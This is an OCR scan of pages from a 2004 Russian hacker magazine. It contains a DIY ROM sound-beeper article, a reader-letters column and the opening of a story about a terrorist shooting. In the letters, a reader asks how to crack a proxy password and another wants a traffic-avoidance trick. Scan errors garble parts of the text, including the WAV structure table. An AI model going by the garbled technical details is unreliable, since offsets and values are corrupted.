ми на схеме. Неполярные конденса- 
торы (то есть те, которые без полю- 
сов) - любые керамические, подходя- 
щие по габаритам. Можно использо- 
вать кондеры сфирмы TREC. Это, кста- 
ти, также относится и к электролити- 
ческим конденсаторам, но, если ты 
патриот, поставь наши (K50-35), они 
ничем не хуже. Так как в данной схе- 
ме компонентов порядочно, думаю, ты 
простишь меня за то, что я не даю 
фото каждого. 

Вроде про компоненты все сказано... 
Хотя нет, не все. В качестве микросхе- 
мы 002 можно использовать моторо- 
ловский аналог- МС14 040. На худой 
конец пойдет китайско-корейский 
клон CD4040B. Для КБЫЛАТ также 
найдется немало альтернативы: 
К156ЛАТ, K176/1A7, CD4ONB. Перечис- 
ленные микрухи в данном случае пол- 
ностью взаимозаменяемы и идентич- 
ны по цоколевке. 

Тебя наверняка гложет вопрос, как 
плату делать будем. Естественно, ца- 
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рапаньем не отделаться: слишком 
много дорожек. Но мы вообще печат- 
ник как таковой и делать не будем. 
Что, заинтриговал? Разъясняю: дело 
в том, что отечественная промышлен- 
ность пошла на встречу потребителю 
и стала выпускать этакие полуфабри- 
каты - макетные платы. Причем ассор- 
тимент их настолько широк, что удов- 
летворит практически любого извра- 
щенца. Нас вполне устроит вариант 
макетника, показанный на рис. 3. Бе- 


ются панельки под микрухи, затем са- 
мые маленькие компоненты (резисто- 
решь в руки ножовку по металлу, от- ры и керамические кондеры) и только 


пиливаешь нужный кусок ПРЯМОУ- в последнюю очередь электролити- 
ГОЛЬНОГО размера (рис. 14) и разме- ческие конденсаторы, переключатели 
щаешь компоненты так, как тебе П2К и переходной разъем для станда- 


удобно (мой вариант на рис. 15). Есте- 
ственно, в первую очередь размеща- 


ртного переходника "LPT материнка <- 
> DB25" (рис. 16). 


Дальше ca- 
мое интерес- 
ное - соеди- 
нение дета- 
лей согласно 
принципи- 
альной схе- 
ме. Не будем 
повторять 
мой горький 
опыт и pasgo- 
будем провод 


Рис. 17. Провод во 


фторопластовой изо- во фтороп- 
Е. ластовой 
изоляции 


(рис. 17). Преимущество этого прово- 
да перед любым другим в тугоплав- 
кости изоляции, это позволит избе- 
жать многих багов. 


Рис. 18. Провод во фторопластовой изоляции 


Ну вот, очередное совокупление с 
паялом подошло к своему логическо- 
му семяизвержению. То, что получи- 
лось у меня в результате и что дол- 
жен получить ты, представлено на 
рис. 18. Но это не конец! Ведь еще не 
запрограммирована микросхема, не 
подготовлены данные для заливки. 


РЫБА ЗАЛИВНАЯ 

и Данными будет звуковой cppar- 
мент. В принципе, монофроническую 
звуковую срразу с частотой дискрети- 
зации 8 кГц можно получить разными 
путями. Например, ветераны, сидящие 


за компом с десяток лет, наверняка 
помнят видоизмененную схему 
COVOX'a, позволяющую записывать 
моносронический 8-битный звуковой 
сигнал с регулируемой частотой вы- 
борки. Кто помладше может восполь- 
зоваться CoolEdit Pro на пару с SB 
Creative Audigy 2. Hy а самым малень- 
ким вполне хватит встроенной звуко- 
вухи на чипсете АС'97, микросрона- 
прищепки "Диалог" и Sound Forge в 
качестве сосрта. Об использовании 
последнего и пойдет далее речь. Выби- 
раем нужную опцию (рис. 19), появля- 
ется окно, как на рис. 20. Устанавлива- 
ем параметры записи согласно скрину 
и записываем. Записал? Закрой окно, 
вырежи нужный сфрагмент и обрабо- 
тай. Под обработкой я подразумеваю 
подгонку под объем и нормализацию 
звукового сигнала. Можно, конечно, 
вставить эффект эхо или "вау", но на 
4096 байт особо не развернешься, 
поэтому не рекомендую. Естественно, 
можно использовать и уже имеющий- 
ся музыкальный фрагмент, преобра- 
зовав его в требуемый формат (8000 
Гц - частота выборки, моно, WAV РСМ, 
это соответствует более-менее пере- 
вариваемому битрейту 64kbps). Ну 
есть у тебя фрагмент. Что дальше? А 
дальше - удаление служебной инфор- 
мации из файла для уменьшения его 
объема. Структура \МА\/-ффайла npegc- 
тавлена в табл. 3. 

Нас интересует раздел, помеченный 
голубым цветом: там, собственно, и на- 
ходятся данные. Процесс "кастрации" 
несложен: достаточно найти последо- 
вательность 64h 6th 74h 618 (это соот- 
ветствует слову 'data' в ASCII), пропус- 
тить следующие четыре байта и выре- 
зать все, что находится выше (верх - 
0000 в НЕХ-представлении). Остаток и 
будет звуковыми данными в чистом 
виде. В [1] для этого даже приведен 
листинг программы на языке Turbo 
Pascal, но мы для наглядности будем 
работать ручками. Кроме ручек нужен 
ножик. Им будет очень удобный, на 
мой взгляд, НЕХ-редактор. Имя сей тул- 
зы незамысловато - HexEdit. Из gocto- 


Байты Содержимое Значение 
0-3 Строка 'RIFF' Идентификатор формата файла 
4-7 32-разрядное число Длина файла - 8 байт 
8-1 Строка 'WAVE' Идентификатор типа ресурса 
2-15 Строка 'fmt' Идентификатор раздела формата данных 
16-19 32-разрядное число Длина раздела - 8 байт 
20-21 16-разрядное число Признак формата записи 
22-23 16-разрядное число Число каналов: 1 - моно, 2 - стерео ит.д. 
АРТ 32-разрядное число Частота квантования, Гц 
28 - 31 32-разрядное число Средняя скорость потока данных, байт/с 
З2- 33 16-разрядное число Размер блока данных, байт 
34-35 16-разрядное число Разрядность данных (8 или 16 бит) 
36 - (п) Другие разделы (не обязательные) 
п- (п+3) Строка 'data' Длина раздела - 8 байт 
(п+4) - (n+7) 32-разрядное число Звуковые данные 
(п+8) - ... 


Табл. 3. Структура ИИАУ-файла 
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инств проги можно выделить gpareHg- 
pon, быструю смену кодировок, изме- 
няемый срормат представления дан- 
ных, смещения в нескольких системах 
счисления, встроенный калькулятор. И 
все это при 400 Кб веса! На диске, при- 
лагаемом к журналу, ты найдешь вер- 
сию 1.2.0.6, и, как утверждает автор, 

это финал ее эволюции как фриварно- 
го продукта. На рис. 21 представлен 
процесс «кастрации» (слабонервным 
просьба не смотреть :-)). Вот и все, 
файл для заливки в ПЗУ готов, оста- 
лось сохранить его с расширением 

* DAT (для удобства). 

Процесс заливки в ПЗУ тоже несло- 
жен: берешь прогу № 1, вводишь имя 
*.РАТ файла, получаешь *.ASC срайл. 
Затем переключаешь свой бипер в ре- 
жим программирования, кормишь про- 
гу №2 *.А$С файлом. После прекраще- 
ния процесса программирования прог- 
рамма пискляво пропищит :). Далее на- 
жимаешь переключатель SAI и повто- 
ряешь процесс, но с другим фрагмен- 
том. Программа заливки специально 
разбита на две части - для удобства 
понимания исходного кода. Кроме того, 
если ты варуг все-таки надумаешь со- 
бирать какой-либо программатор, то 
столкнешься с проблемой выбора 
qpopmata корма для сопровождающего 
его софта. И тогда тебе наверняка при- 
дется использовать тот или иной ку- 
сок. Но в принципе, куски несложно 
сшить - достаточно перекодировать 
массивы на лету, без записи *.ASC 
файла. Но эту задачу я оставляю тебе 
для тренинга. На этом все, дерзай! 


Рис. 10. Панельки 
бывают разные 


| Рис. 21. Режем под корень 
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Лозовский Александр aka Dr.Klouniz 


(spec@real.xakep.ru) 


FROM: ГАМБАРОВ РАМИН 


CRAMINET@MAIL.RU] 
SUBJECT: ФОРУМ И ЧАТ 


Здравствуйте. Есть ли токая программка, 

где можно создать чат или форум? 
Наподобие FrontPage для создания сайта. Если 
есть, то где можно скачать? Заранее спасибо. 


ОТВЕТ: 

Токая? Это от слова «токовать»? Я 
его видел в учебнике по биологии. То- 
куют глухари и фазаны, кажется, для 
привлечения самок. Больше ничего по 
этой теме не знаю :(. 

Чат создавать не надо, надо юзать 
IRC и создать там свой канал. А еще 
лучше - тусоваться на канале #Х$ се- 
ти dalnet.ru :). Честно говоря, никогда 
не видел сайтов, веб-чат которых нес 
бы какую-то общественную ценность. 
Форум сделать вообще просто, нужно 
затусовать на http://www.phpbb.com/down- 
loads.php и качнуть там борду. Затем Ha- 
живить MySQL (или PostgreSQL) и нас- 
лаждаться жизнью. Как вариант - 
слить invision power board на 
http://www.invisionboard.com/, он побыстрее, 
и некоторые его любят больше. Вот и 
все, читай доки, они рулез. 


ХАКЕРСПЕЦ | 08(45)| 2004 


FROM: SOFTERO7 [SOFTERO7@MAIL.RU] 


SUBJECT: ***NOCOBETYATE ЧИТАТЕЛЯМ ЖУРНАЛА 


Здравствуйте, spec. 

Посоветуйте читателям журнала совсем новую прогу, которая только что появи- 
лась в сети. Она сканирует интернет-адреса, скачивает найденные страницы, грабит ма- 
ил-адреса, рассылает по найденным адресам вашу рекламу. Причем может работать 
скрытно в интернет-кафе. Супер прога! Можно за месяц сделать миллион адресов и за- 
рабатывать на рекламе. Вот ссылка: ‹реклама стоит денег, а ты мне их не дал :) - 
Dr.Klouniz>. 


OTBET: 

О ga, go тебя (это ведь ты ее написал? :)) никто подобного даже по- 
мыслить не мог. Представить себе: грабит адреса, да еще и рассылает 
:). Знаешь, у нас в Бразилии очень не любят спаммеров и тех, кто их 
поддерживает, поэтому рекламируй свой великий труд другим спосо- 
бом. Советовать нашим читателям мы ничего не будем, они не такие, 
они не советуют никому увеличить грудь вакуумным грудоувеличите- 
лем, раздуть фаллос с помощью пены «макрофлекс» или нанять «де- 
шов_Рабоч_Силу_Из_Казахста_Для_перетаскивания_мебели» :). 


FROM: ВАНЯ [IVAN@MAIL.KAMCHATKA.RU] 


SUBJECT: КРИТИКА 


Господа, ну что вы творите? Диск ваш в журнале за 06.2004 ну не то чтобы 

закосяченный, а просто у меня нет слов. Он просто не читается, я попробовал 
скопировать его в DOSe, но Нортон, старый добрый Нортон, выдал такое в заголовках! Я 
лично такое видел, когда ЕХЕшник открываешь через F3. Вы там разберитесь или посо- 
ветуйте, как с этим бороться, ну или архив выложите на сайте вашем, а то проги уж там 
больно интересные судя по названиям. 


ОТВЕТ: 

Ребята, ну давайте уже излагать свои мысли грамотно и логично. Не- 
ужели жалко? Насколько я понял, с диска скопировать ты ничего не 
можешь, но как диск он все же воспринимается. Попробуй слить весь 
CD на 2х-4х скоростях на винт, прога такая есть - CDSlow. Также пос- 
мотри, не организовал ли ты на поверхности диска царапины или сле- 
ды, хм, биологических жидкостей. Если все чисто, но диск битый - пи- 
ши заяву в 3 экземплярах на имя Аваланча, мы заменим злой компакт. 
Дело в том, что вопреки слухам, диски штампует не Андрей Каролик в 
своем варез-подвале, а вполне серьезный свечной заводик, и за его 
действиями мы не в состоянии уследить :(. 

P.S. Всем, кто недоволен качеством диска, стоит написать письмо ре- 
дактору диска на Sky@real.xakep.ru. Если он выяснит, что виноват за- 
вод, то ты получишь новый, нормальный компакт лично от нас. Можно 
даже с моим автографом :). А если ты девушка (красивая) - то даже с 
двумя автографами. 


FROM: IVAN IVANOVICH [NEO_MAIL@PROGRAMIST.RU] 


SUBJECT: OT ЧИТАТЕЛЯ 


Hi, уважаемая редакция. 

Пишу я вам вот по какому делу. Живу я в Украине (Луганск), и ваших журналов 
здесь вообще не продают. Узнал о вашем журнале, когда был в Москве и увидел 
журнал на прилавке. Это было год назад. На вашем сайте я увидел журналы ХАКЕР 
СПЕЦ. 2004 #3/2004 #4/2004 в текстовом формате. Я вас очень прошу подсказать, где 
мне можно достать эти номера в pdf-qopmare. Помогите мне, я вас очень прошу. 


ОТВЕТ: 

В каждом последующем журнале ВСЕГДА есть pdf предыдущего 
номера. Так что достать номера можно, либо скачав в инете (они там 
появляются на любительских сайтах), либо вытрейдив/попросив у 
какого-нибудь московского читателя. Кстати, на Украине я был, 
только не в Луганске, а в Бердянске, и очень удивился, что 
пешеходов там принято пропускать, а не давить колесами :). Но с 
горячей водой пора бы разобраться, товарищи. Разберетесь - приеду 
лично еще раз, подарю пару номеров :). 


FROM: "NEIROMIND @™ [NEIROMIND@MAIL.RU] 


SUBJECT: HELP 


Здравствуй, любимая редакция =). 

Такой трабл: срочно нужен ХАКЕР Спец #4 Личная безопасность!!! В силу 
определенных обстоятельств не смогла купить в апреле =(. Подскажите, плиз, где его 
можно достать... 

P.S. Обещаю скоро подписаться!!! Честно-честно =). А то надоело уже по палаткам 
бегать, ловя удивленные взгляды мужского населения 


ОТВЕТ: 

Здравствуй, любимая читательница! Чувствую, не зря я тут 
разбиваю пальцы в кровь о клавиатуру, ох, не зря :). А ведь всего-то и 
надо тебе - купить Спец по XP, на диске к нему и лежит PDF «личной 
безопасности». Кстати, в каком виде ты ходишь покупать Спец, что 
ловишь удивленные взгляды мужского населения? Отпиши 
поподробнее :). Подпишись обязательно, я проверю. 


FROM: RUMBA [AMIGO@ELIZOVO.RU] 


SUBJECT: Е-МЫЛО 


Дарова, spec ! 

Прочитал вашу статью "В чем смысл жизни? Размышления о модемах и 
локалках" (205 (42)) и очень заинтересовался бесплатным трафиком через почтовый 
ящик... Ведь он у меня бесплатен. Я живу далеко не в Москве и тарифы у нас <CEN- 
SORED> -> 4 р. за метр глобала. Сами понимаете, грабеж . Если не жалко, поделитесь 
секретом, как все это дело организовать... please. 


ОТВЕТ: 

Да, с буржуями надо бороться, только учти, что пров, который заме- 
тит, что на халявный мыльник приходит по 200 Гб в месяц, может уди- 
виться твоей обширной переписке :). И отключить тебя нафиг. Так что 
соблюдай умеренность в этом вопросе :). Для организации халявы 
нужны: а) хороший хостинг, которого не расстроит твоя любовь к 
большому трафику 6) перл-скрипт senddfmymail-1.1.1 
(www.nixp.ru/shurup/coding/, написанный нашим человеком) или аналогич- 
ный, который тебе там придется разместить. Вот и все, остальное - в 
доках, к скрипту прилагается даже FAQ. 


FROM: MUZA [MUZA@MURAVLENKO.RU] 


SUBJECT: HELP ME 


Здрасте! HELP МЕ, если не трудно ))). Раньше через Оперу подключалась к 

прокси-серверу, а теперь прокси-сервер требует ввести имя и пароль. 
Подскажите, как или какой прграммой можно это подобрать. ПОЖАЛУЙСТА. Очень, 
очень сильно надо. Заранее благодарна! 


ОТВЕТ: 

Хелло, Муза. Что за прокси-то? Если провайдерский, то и насилуй 
своего провайдера - звони и требуй логин и пасс. Если просто левый 
прокси - смени его на другой и не напрягайся. Если влом искать, просто 
зайди на Void.ru, там их время от времени проверяют и выкладывают. 


FROM: КИРИЛЛ 
[NEVSKYFAN@CRAZY.RU] 
SUBJECT: ЕСТЬ ПРЕДЛОЖЕНИЕ... 


Здарова, Спец! ][отел предложить 

вашей редакции задуматься над таким 
вопросом: не сделать ли вам в конце каждого го- 
ga голосование на сайте о лучшем Спеце года? 
Ваша редакция хотя бы будет знать, какие 
статьи нравятся читателям, а какие не нравятся, 
исходя из этого можно будет чаще печатать в 
журнале статьи, которые читатели будут читать с 
огромным удовольствием и применять на практи- 
ке прочитанное. Или я неправ ? 


ОТВЕТ: 

Ты прав. Нам интересно знать мнение 
читателей, потому что именно для них 
мы и пишем :). Поэтому нами была 
организована тест-группа, и, для того 
чтобы эффективно высказывать свое 
мнение (оно точно будет учтено), 
необходимо в нее заджойниться. Просто 
написать о своем горячем желании на 
vote@real.xakep.ru. Если не хочешь - 
пожалуйста, у тебя ведь есть форум на 
Xakep.ru, наш канал Ha далнете, наши 
мыльники в эдиториале, а в журнале - 
так даже и мобила моя есть. Пиши, 
высказывайся - с удовольствием 
почитаем. 


FROM: "VI-2™ [VI-2@MAIL.RU] 


SUBJECT: CEHKC 


Здравствуйте, редакция журнала 
Спец-Хакер! 

Недавно прочитал ваш журнал за январь в 
электронном виде. В инете бываю часто, а 
покупать журнал не всегда имеется 
возможность. Читал статью про ZX-Spectrum, аж 
слеза навернулась... Спасибо, что вспомнили про 
игрушку моего детства, спасибо, ребята, 
молодцы... 


ОТВЕТ: 

И тебе спасибо, доброе слово и ре- 
дактору приятно :). Статью эту писал 
дяденька, который до сих пор сидит на 
спеке и не видит смысла пересажи- 
ваться на другие тачки. Поэтому, когда 
я получил эту статью через фидо-ин- 
тернет гейт в UUE :), я тоже немного 
прослезился, вспомнив Микрошу, БК и 
многие другие тачки, с которыми меня 
сводила судьба. Хотя над этой статьей 
пришлось здорово напрячься, все же 
контент того стоил. Ностальжи... Ны- 
нешняя молодежь уже и не упомнит 
людей, которые autoexec.bat вживую 
видели, не то что Спектрум :). 
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Niro (niro@real.xakep.ru) 


ЬЛАГОСЛОВИ, 
ГОСПОДИ... 


епляков сидел Ha кухне, 
втиснувшись на табурет- 
ке между столом и подо- 
конником, и читал газету. 
Яичница уже остыла и не 
производила на него ни- 
какого впечатления. Вош- 
ла жена, молча кинула 
взгляд на него и, что-то 
прошептав себе под нос, 
отправилась в ванную. 
Через несколько секунд 
оттуда донесся шум фена; Тепляков оторвал глаза от 
статьи, посмотрел поверх газетного листа и вновь погру- 
зился в чтение. 

Фен замолчал, правда, ненадолго. Тепляков положил 
газету на стол, вывалил яичницу с тарелки в мусорное Beg- 
ро, прикрыв сверху вчерашней газетой, встал и выглянул в 
окно, сверяя увиденное с прогнозом погоды, только что ус- 
лышанным в новостях. 

- Опять врут, - развел он руками, увидев грозовые тучи 
где-то на горизонте. - Дождя не миновать. 

Плеснул в чашку кипятку, насыпал кофе и сливок, быст- 
ро проглотил получившуюся смесь, не обращая внимания 
на то, как она обжигает язык и глотку. Надо же было хоть 
что-то закинуть в желудок перед трудовым днем! 

Жена вышла из ванной, прошла мимо, делая вид, что не 
замечает его. Тепляков почувствовал тепло от ее волосы, 
запах какого-то дорогого шампуня и непроизвольно 
отстранился, как делал уже последние полгода или боль- 
ше. Отстранился не потому, что она была ему неприятна, 
нет - Тепляков чувствовал, что сам неприятен ей, и старал- 
ся сократить свое присутствие дома до минимума. 

- Даша! - жена звала дочь завтракать. И так каждое ут- 
ро: ему - пригоревшая яичница без слов, дочери - все ос- 
тальное внимание и тепло. Отец мельком заглянул к ней в 
комнату, задумался. Дочь, не замечая ничего вокруг, сиде- 
ла за компьютером. Тяжело было уходить каждое утро на 
работу, унося на плечах такой груз... 

Он набросил на плечи куртку, постоял в прихожей, на- 
деясь, что жена выйдет и проводит - хотя бы взглядом. 
Нет, никого. Он уже привык, что ключ в замке поворачива- 
ется лишь через несколько секунд после того, как он выхо- 
дит на площадку и начинает спускаться по лестнице. Вот и 
сейчас - он прошел несколько ступенек, когда за спиной 
рука жены захлопнула чуть распахнутую дверь и закрыла 
ее на замок. Тепляков вздрогнул, подумал, что вслед при- 
летит хотя бы «пока», потом глубоко вздохнул и вышел на 
улицу; метро было недалеко, и он, подняв воротник, напра- 
вился в его сторону, на ходу отметая все мысли, что были 
бы в его работе лишними. 

В окне квартиры Тепляковых, на четвертом этаже, поя- 
вилось женское лицо. Глаза внимательно смотрели на спи- 
ну мужа, на куртку с трижды проклятыми буквами, отняв- 
шими у нее мужа, - МЧС... 


ЖЖЖЖЖЖЖЖ 


..«Мне надо отойти на пару минут», - прочитал Димка 
на экране и ухмыльнулся. Ну, надо значит надо. Он встал с 
кресла, выгнул усталую спину, словно кот, оглянулся по 
сторонам, прислушался к подступающему чувству голода и 
вышел на балкон. 

С высоты шестого этажа видно было достаточно далеко. 
Дом Димки стоял на окраине нового микрорайона, состоя- 
щего более чем из двадцати высоток. По половине пери- 
метра микрорайона пролегало искусственное озеро иде- 
альной чистоты, пока еще не загаженное обитателями но- 
востроек. В нем сейчас отражалось закатное солнце, окра- 
сившее воду в оранжевый цвет. 

Дима оперся на перила, размял уставшие от клавиату- 
ры пальцы, посмотрел вниз - туда, где возле подъезда на 
детской площадке резвилась малышня. Пара десятков 
мальчишек и девчонок в окружении матерей производили 


жуткий шум, на все голоса стараясь перекричать друг дру- 
га. Из одного конца двора в другой летал разноцветный 
мяч, кто-то носился с игрушечным автоматом, кто-то строил 
домик из песка. На лавочках у подъездов - вечные пенсио- 
неры, беседующие о своих детях, болезнях, политике. Не- 
подалеку - цепь аккуратных кирпичных гаражей, несколь- 
ко автомобилей со снятыми колесами или открытыми капо- 
тами, вьющиеся вокруг них владельцы, озадаченные тем, 
что у них опять «не сосет», «стучит», «троит» и «пробуксо- 
вывает». 

Внимательно прищурившись, Дима разглядел на со- 
бачьей площадке и рядом с ней несколько симпатичных 
дам с собаками. Одна из них привлекла его особое внима- 
ние своей яркой внешностью, но внезапно въехавший во 
двор грузовик-сфургон заставил ее вместе с собакой отско- 
чить на газон, тем самым скрыв ее от Димкиных глаз. До 
его ушей донеслась ругань на нерусском языке, похоже, 
она принадлежала кавказцам. Потом хлопнула дверца гру- 
зовика, но Дима никого не увидел - то ли шофер не вышел 
из машины, то ли он стоял с другой стороны за фургоном. 
Пару раз громко гавкнул ротвейлер, после чего все стихло. 

Дима еще раз кинул взгляд на озеро, отметил там пару 
лодок с безумными рыбаками, которые наивно полагали, 
что рыба в искусственном водоеме может появиться сама 
собой. Никогда он не понимал этой страсти к рыбной лов- 
ле; он вообще мало понимал все то, что не имело отноше- 
ния к компьютерам. 

- Ну что, вернулась? - спросил он у компьютера, обер- 
нувшись в комнату. - Время вышло... 


Отодвинув штору, Дима 
шагнул внутрь прохладной 
комнаты. 


Отодвинув штору, Дима шагнул внутрь прохладной ком- 
наты. В углу экрана мигал значок пришедшего сообщения. 
Он крутанул кресло к себе, опустился в него, сделал нес- 
колько оборотов, отталкиваясь ногой от пола, думая, что 
же на этот раз у него спросят. 

«Расскажи о себе...» - горело на экране. Этого Димка не 
ожидал. Он бы хотел продолжения того легкого спирта, 
что завязался у него с невидимой собеседницей, назвав- 
шейся интересным и странным именем Дана. На шутку, 
связанную с трансвеститами и Даной Интернешнл, она не 
отреагировала, что можно было истолковать двояко - либо 
как незнание факта, либо как обиду. Дима больше и не пы- 
тался узнать ничего о сексуальных пристрастиях Даны, ог- 
раничившись разговором о ее внешних данных, одежде, 
любимых срильмах, актерах и актрисах... 

- О себе, - хмыкнул Дима. - Легко сказать - о себе. Хотя 
можно попробовать. 

Он положил пальцы на клавиатуру, на секунду задумал- 
ся и набрал, проговаривая вслух, чтобы не сорваться на 
пошлость: 

- Мое имя ты уже знаешь. Профессия - не приобрел, 
молод еще... 


ЖЖЖЖЖЖЖЖ 


Рабочий день выдался спокойный, даже слишком. Теп- 
ляков не любил подобные тихие дежурства по ряду при- 
чин. Во-первых, они жутко выматывали нервную систему. 
Ждать ежеминутно, ежесекундно тревоги, поворачивать 
голову к дверям всякий раз, когда они открываются, ожи- 
дая увидеть в них посыльного и съемочную группу, этих 
любителей «чернухи» и крови, - это заставляло уходить с 
таких дежурств домой еще более измотанным, чем после 
суток работы где-нибудь под землей, в огне или по колено 
в воде. Во-вторых, Тепляков всегда чувствовал себя вино- 
ватым за то, что доля испытаний в этот день миновала его, 
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особенно если он знал, что накануне было очень и очень 
жарко. Казалось, что ребята из предыдущей смены сдела- 
ли часть и его работы, облегчая ему существование, а на 
самом деле осложняя его. В-третьких, и это было хуже все- 
го, Тепляков оказывался не готовым к чрезвычайным ситу- 
ациям, оставаясь наедине со своими мыслями о семье, д0- 
ме, дочери и прочих бытовых мелочах, из которых скроена 
жизнь. Порой, поддаваясь на это кажущееся спокойствие, 
он погружался в себя, и тогда сирена заставала его врасп- 
лох, и тогда чего он мог совершить ошибку. Конечно же, он 
не признавался в этом никому, тем более психологу nog- 
разделения: можно было запросто лишиться работы. Но 
себе - себе самому! - он уже давно признался, живя только 
лишь ожиданием этой самой ошибки, которая вывернет 
все его существование наизнанку и подтолкнет к той чер- 
те, за которой уже ничего изменить будет нельзя. 

Сегодня он, как было всегда при отсутствии вызовов за 
всю смену, сидел у телевизора и невидящим взглядом 
смотрел на мелькающие кадры новостей, рекламы и каких- 
то бестолковых фильмов. Мысли его были далеко отсюда; 
он вспоминал те дни, когда преподавал в школе альпинис- 
тов, прекратив сам заниматься безрассудным лазаньем по 
горам, которым была наполнена его молодость. Знакомство 
с женой, рождение дочки, ее первые шаги и первые слова, 
полная устроенность и благополучие... Пока его не пригла- 
сили в ведомство Шойгу работать в отряде МЧС. Это приг- 
лашение перевернуло жизнь Теплякова с ног на голову. 
Ему пришлось уйти из школы, так как работа спасателем 
не терпела совмещений. Ему пришлось смириться с гради- 
ком работы, а, точнее, с его отсутствием: никогда нельзя 


В голове Димы пронеслась 
одна-единственная мысль: 
«Террористы!» 


было предугадать, когда и где могут пригодиться способ- 
ности Теплякова по подъему на любую высоту и спуску в 
глубины лифтовых шахт и пещер. Ему пришлось смирить- 
ся с этим - ему, но не жене. И семейная жизнь полетела ку- 
вырком. Он понимал, что виной всему работа, но, посколь- 
ку был принципиальным человеком, не мог пойти против 
своих жизненных установок. Если его умения могли спасти 
жизнь человека - он должен использовать их по максиму- 
му. Правда, это нарушало семейный уклад... Но тут прихо- 
дилось спорить только с самим собой, ибо с женой он не 
спорил уже давно. 

Тепляков приподнялся на диване, поудобнее устроился 
и собрался было задремать, как вдруг над дверью загоре- 
лась красная мигающая лампа, моментально окрасившая 
все в кровавый цвет. Следом присоединился противный 
звук сирены. 

- Какого черта! - недовольно дернулся Тепляков. - Кто 
придумал эту проклятую сирену?! 

Он встал, сделал несколько энергичных взмахов руками 
и широкими шагами направился к лестнице. Команда уже 
собиралась. 

- Кто-нибудь в курсе, что случилось? - спросил он, под- 
ходя к парням. - Куда на этот раз? 

- Пока сложно сказать. Сейчас придет босс и проложит 
нам курс, - отозвался водитель их спецавтобуса, которого 
больше всего интересовало, далеко ли ехать. - Ты, глав- 
ное, не переживай - работа всем найдется... 

- Да пошел ты, - огрызнулся Тепляков в ответ. - По- 
меньше бы ее, этой работы... 

- Устал? - раздался вопрос из-за спины. - Или надоело? 

Тепляков не стал оборачиваться, чтобы узнать, у кого 
же хватило ума спросить подобное. Он захотел ответить 
резко, но слова почему-то застряли в горле, он махнул ру- 
кой и промолчал. Слово «устал» подходило, конечно же, 
больше. Но и «надоело» тоже... А потом пришел босс, и он 
забыл этот неприятный вопрос из-за спины. Работа была 
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не из легких; он всю дорогу с закрытыми глазами BCNOMU- 
нал тонкости своего альпинистского искусства, чтобы там, 
на месте, уже ни на мгновенье не задумываться. Мысли о 
жене и дочери отошли на второй план: переключаться он 
пока еще не разучился... 


ЖЖЖЖЖЖЖЖ 


«Молод еще» Димка все-таки вычеркнул, чтобы не по- 
казаться собеседнице малолеткой, исправил на «пока 
учусь» - пусть думает, что хочет, о его возрасте. «Интере- 
сы мои - на первом месте все, что связано с компьюте- 
ром, - продолжил он. - Хочу научиться классно программи- 
ровать, хочу быть похожим на...» Он замялся, потому что, 
кроме Билла Гейтса и Линуса Торвальбдса, на ум не прихо- 
дил никто. 

В это время во дворе очень громко рыкнул тот самый 
фургон, потом еще и еще - судя по всему, водитель вы- 
полнял какой-то замысловатый маневр. Димка уже предс- 
тавил себе, как дружно начинают ругаться старушки y 
подъездов, надышавшись черным дымом и нанюхавшись 
сгоревшего машинного масла - и вдруг понял, что, кроме 
этого звука двигателя, он не слышит снизу, с улицы, боль- 
ше ничего: ни единого крика, ни единого возгласа возму- 
щения. 

А потом за окном что-то сухо щелкнуло. 

Димка взорогнул; нечаянно шевельнулся палец на 
мышке, и набранное, но не отредактированное сообщение 
умчалось к Дане. Он даже не обратил на это внимания - та 
тишина, что туманом наплывала из-под шторы, слабо ко- 
лышущейся у балконной двери, пугала его. Он осторожно 
приподнялся в кресле - и щелчок, на этот раз показавший- 
ся более громким, повторился. 

Димка нахмурил брови, соображая, что же происходит, 
как вдруг на улице закричала женщина, закричала громко, 
просто «а-а-а!..», а следом грохнула автоматная очередь. В 
том, что это был автомат, Димка не сомневался. Он маши- 
нально пригнулся, кресло покатилось в сторону, он едва не 
упал, но удержался и на корточках подобрался к балкон- 
ной двери. Выстрелы повторились, следом раздался крик, 
но не такой, что издала женщина, а властный, сильный - 
кто-то отдавал приказы. Та же кавказская речь. В голове 
Димы пронеслась одна-единственная мысль: «Террорис- 
ты» Он прижался спиной к батарее и замер в ожидании 
автоматной очереди. Почему-то он был уверен, что пули 
найдут именно его окно и оно с хрустом осыплется ему на 
голову. Тело мелко, предательски задрожало, спина плот- 
нее прижалась к батарее, не замечая ее ребристости. Захо- 
телось стать маленьким, незаметным, раствориться... 

Еще одна автоматная очередь. Где-то далеко завыла 
сирена, громко и пронзительно. И, словно это был сигнал к 
действию, с улицы донеслось столько разных звуков, что 
Димка перестал соображать, что же там происходит. Хрип- 
ло и беспорядочно залаяли собаки, заголосили какие-то 
женщины, выкрикивающие имена своих детей; пару раз 
щелкнули пистолетные выстрелы, рыкнул мотоциклетный 
движок, уносящий невидимого хозяина подальше от пере- 
стрелки. И напоследок засвистели тормоза - по-видимому, 
милицейский патруль влетел на территорию микрорайона 
на приличной скорости. Сирена замолчала, и кто-то крик- 
нул в мегафон: «Бросай оружие, твары», грохнул еще один 
выстрел из пистолета, а потом прозвучала длинная авто- 
матная очередь - настолько длинная, что, когда оружие за- 
молкло, эхо еще долго звучало в Димкиных ушах. 

Спустя несколько секунд Дима понял, что все кончи- 
лось. Тишина перестала быть напряженной - скорее, она го- 
ворила о том, что внизу, под балконом, уже никто не будет 
стрелять. Он краем глаза посмотрел на экран монитора - от- 
вета от Даны пока не пришло, потом встал в полный рост, 
удивляясь, как мог испугаться шальной пули, которая по 
всем законам сфизики не могла бы влететь в его окна. 

Отодвинув штору, он рискнул выглянуть на балкон, от- 
мечая по сторонам таких же осторожных соседей - кто-то 
отгонял не в меру любопытных членов семьи внутрь квар- 


тиры, кто-то нервно прикуривал, размахивая в воздухе го- 
рящей спичкой, будто боясь бросить ее вниз с балкона. 
Скрип балконных дверей и шарканье ног слышались и 
сверху, и снизу от Димки. 

Пара голубей, забившихся в угол балкона, рванулась в 
небо, едва увидев хозяина квартиры. Димка вздрогнул, но 
не испугался, подошел к перилам и посмотрел вниз, как и 
еще примерно двести человек на балконах с этой стороны 
дома. Около подъезда, перегородив тротуар, стоял тот са- 
мый фургон, с которого, как думал Дима, все и началось. 
Возле него лицом вниз лежал человек, руки его были рас- 
кинуты, одна из них лежала на автомате Калашникова. В 
кабине фургона были прострелены стекла; колеса спуще- 
ны, из-за чего он выглядел заметно перекошенным. В пят- 
надцати-двадцати метрах стоял милицейский жигуленок с 
раскрытыми дверями; возле одной из них парень в ярко- 
зеленом жилете с надписью «ГИБДД» возился над своим 
напарником, лежащим возле колеса. А на собачьей пло- 
